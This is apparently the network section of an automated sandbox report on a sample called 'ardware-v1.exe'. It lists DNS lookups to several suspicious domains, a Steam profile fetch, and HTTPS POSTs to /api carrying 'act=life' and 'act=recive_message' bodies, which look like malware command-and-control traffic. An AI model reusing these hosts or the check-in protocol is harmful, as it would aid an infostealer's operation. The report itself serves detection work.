                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.855942965 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.856190920 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.856437922 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.856437922 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.856437922 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:53:00.085963011 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:53:00.086024046 CET44349943172.67.157.254192.168.2.5

                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:23.782596111 CET5243753192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:24.091253996 CET53524371.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:24.101138115 CET5151453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.103064060 CET5151453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562846899 CET53515141.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562935114 CET53515141.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.318715096 CET6137753192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.304740906 CET6137753192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.765995026 CET53613771.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.766036034 CET53613771.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.439533949 CET5428553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.748703003 CET53542851.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.751950979 CET4992453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.975929976 CET53499241.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.982467890 CET5104453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.201455116 CET53510441.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.204519033 CET5684253192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.604610920 CET53568421.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.607671976 CET5503153192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.831048965 CET53550311.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.832361937 CET6123553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.146445036 CET53612351.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.149770021 CET5860553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.287266970 CET53586051.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.839624882 CET4937153192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.151508093 CET53493711.1.1.1192.168.2.5

                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:23.782596111 CET192.168.2.51.1.1.10x15f0Standard query (0)spend-shiny.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:24.101138115 CET192.168.2.51.1.1.10xfda2Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.103064060 CET192.168.2.51.1.1.10xfda2Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.318715096 CET192.168.2.51.1.1.10xfed5Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.304740906 CET192.168.2.51.1.1.10xfed5Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.439533949 CET192.168.2.51.1.1.10xe79dStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.751950979 CET192.168.2.51.1.1.10xf272Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.982467890 CET192.168.2.51.1.1.10x13Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.204519033 CET192.168.2.51.1.1.10xfa2bStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.607671976 CET192.168.2.51.1.1.10xd726Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.832361937 CET192.168.2.51.1.1.10xf7e9Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.149770021 CET192.168.2.51.1.1.10xfad2Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.839624882 CET192.168.2.51.1.1.10xb24dStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:24.091253996 CET1.1.1.1192.168.2.50x15f0Name error (3)spend-shiny.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562846899 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562846899 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562846899 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562935114 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562935114 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.562935114 CET1.1.1.1192.168.2.50xfda2No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.765995026 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.765995026 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.765995026 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.766036034 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.766036034 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.766036034 CET1.1.1.1192.168.2.50xfed5No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.748703003 CET1.1.1.1192.168.2.50xe79dName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.975929976 CET1.1.1.1192.168.2.50xf272Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.201455116 CET1.1.1.1192.168.2.50x13Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.604610920 CET1.1.1.1192.168.2.50xfa2bName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:32.831048965 CET1.1.1.1192.168.2.50xd726Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.146445036 CET1.1.1.1192.168.2.50xf7e9Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.287266970 CET1.1.1.1192.168.2.50xfad2No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.151508093 CET1.1.1.1192.168.2.50xb24dNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.151508093 CET1.1.1.1192.168.2.50xb24dNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                    • immureprech.biz
                                                                                                                                                                                                                                    • deafeninggeh.biz
                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                    • lev-tolstoi.com

                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.54985845.77.249.794431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:27 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                    Host: immureprech.biz
                                                                                                                                                                                                                                    2024-12-18 08:52:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                    2024-12-18 08:52:28 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:27 GMT
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.549869104.131.68.180443
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:31 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                    Host: deafeninggeh.biz
                                                                                                                                                                                                                                    2024-12-18 08:52:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                    2024-12-18 08:52:31 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:31 GMT
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.54987923.55.153.1064431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:34 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                    2024-12-18 08:52:35 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:35 GMT
                                                                                                                                                                                                                                    Content-Length: 35121
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: sessionid=a132d2d959faa093de0158e2; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                    2024-12-18 08:52:35 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                    2024-12-18 08:52:35 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                    2024-12-18 08:52:35 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                    Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.549886172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:37 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                    2024-12-18 08:52:38 UTC1034INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:37 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=7veirhegm0bp5fn1d4t0c0ptoo; expires=Sun, 13-Apr-2025 02:39:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7QsfePKIpYzomUkQI7tfytQyPgUgkp2HoWlS%2BLJX6a7DxP02EcLUBQki2%2FdGESw1aXxM7NIPlKNdIDyAA03nFt04H5PmLURiyiqs8uvc2DtbGHiGepNy5cc9Se3q11kBtE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deaf748b841d2-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1766&rtt_var=721&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1457813&cwnd=251&unsent_bytes=0&cid=e14d6aa5d1955431&ts=728&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                                                                    2024-12-18 08:52:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.549892172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:39 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:39 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d
                                                                                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=tfL8re--&j=
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1037INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:40 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=eoootphicbc0urf0k275k71att; expires=Sun, 13-Apr-2025 02:39:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RPMiiHnoZcT4y8XmXFBe%2F8d8RhOFIXSzOd0FubmsOR51%2FdLb4PdZhwOPo0MFtxV7TfCI0jj9kB9%2BiuCCyfnMx0x9RXhARJlVVaL2H8wgsScV9Lpj7W8WSGJFJBLDaD%2FvBw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb044bb642c8-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1658&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=941&delivery_rate=1681059&cwnd=225&unsent_bytes=0&cid=2d6b7ea10e779d8d&ts=1054&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC332INData Raw: 31 64 32 65 0d 0a 47 4f 38 42 59 42 5a 46 2f 6b 72 5a 67 78 38 31 73 72 6c 75 69 77 6e 6e 6f 42 50 56 32 56 73 59 44 47 76 55 54 67 46 4a 41 55 64 6a 7a 58 64 43 4c 48 48 53 61 4b 72 6d 50 51 2f 47 79 78 76 75 4a 63 58 42 64 2f 66 6a 50 58 6c 67 47 4c 46 69 49 7a 39 73 5a 53 4b 4a 59 41 78 6c 49 4e 4a 6f 76 50 73 39 44 2b 6e 43 54 4f 35 6e 78 5a 6f 78 73 4c 4d 35 65 57 41 4a 74 53 56 75 4f 57 30 6b 63 49 4e 6d 43 48 4d 6d 6d 69 75 31 37 6e 70 51 31 39 67 45 35 57 43 4b 79 48 37 33 39 58 6c 39 64 6b 6e 75 62 45 77 73 64 53 5a 56 6a 6e 49 4c 4e 44 6a 53 4d 66 76 6d 63 52 65 49 6d 77 2f 75 61 34 76 47 64 37 36 78 4d 33 42 6f 43 4c 41 6b 63 53 42 6e 4c 33 43 4e 5a 51 6c 35 4c 34 34 6d 76 2b 6c 78 56 74 33 59 54 4b 63 72 67 74 6f 78 37 2f 74 71 53 47 30 59 70
                                                                                                                                                                                                                                    Data Ascii: 1d2eGO8BYBZF/krZgx81srluiwnnoBPV2VsYDGvUTgFJAUdjzXdCLHHSaKrmPQ/GyxvuJcXBd/fjPXlgGLFiIz9sZSKJYAxlINJovPs9D+nCTO5nxZoxsLM5eWAJtSVuOW0kcINmCHMmmiu17npQ19gE5WCKyH739Xl9dknubEwsdSZVjnILNDjSMfvmcReImw/ua4vGd76xM3BoCLAkcSBnL3CNZQl5L44mv+lxVt3YTKcrgtox7/tqSG0Yp
                                                                                                                                                                                                                                    2024-12-18 08:52:40 UTC1369INData Raw: 53 76 4e 47 73 75 46 76 67 31 49 79 78 76 5a 53 4c 4e 5a 51 78 31 4b 70 77 36 73 2b 70 32 55 73 4c 51 42 65 52 6d 68 63 39 37 75 4c 67 35 66 57 51 44 75 53 5a 6e 4a 6d 34 6a 65 6f 30 6a 54 44 51 67 68 47 6a 6a 6f 56 35 53 77 4e 77 41 2f 79 6d 2f 67 6d 37 35 6f 6e 6c 39 59 6b 6e 75 62 47 73 75 59 43 5a 78 67 6d 41 4b 66 7a 57 63 4f 72 33 73 65 45 58 57 33 67 4c 6a 61 4a 66 49 66 37 47 34 4d 48 46 6e 44 4c 45 6f 49 32 55 6a 49 6d 4c 4e 4f 30 4a 56 4b 70 63 6b 73 66 5a 39 46 38 2b 56 46 61 6c 73 69 59 49 70 39 37 38 34 66 6d 38 4e 75 43 4a 6e 4a 32 55 72 64 34 4a 6c 43 48 51 67 6c 69 43 7a 34 48 42 63 33 39 73 4a 35 47 2b 44 7a 6e 43 79 2b 33 63 36 61 52 48 32 64 43 4d 46 5a 43 5a 6f 7a 31 59 42 65 69 6d 62 50 76 76 2b 4d 30 36 51 33 41 43 70 4d 38 58 4d 64
                                                                                                                                                                                                                                    Data Ascii: SvNGsuFvg1IyxvZSLNZQx1Kpw6s+p2UsLQBeRmhc97uLg5fWQDuSZnJm4jeo0jTDQghGjjoV5SwNwA/ym/gm75onl9YknubGsuYCZxgmAKfzWcOr3seEXW3gLjaJfIf7G4MHFnDLEoI2UjImLNO0JVKpcksfZ9F8+VFalsiYIp9784fm8NuCJnJ2Urd4JlCHQgliCz4HBc39sJ5G+DznCy+3c6aRH2dCMFZCZoz1YBeimbPvv+M06Q3ACpM8XMd
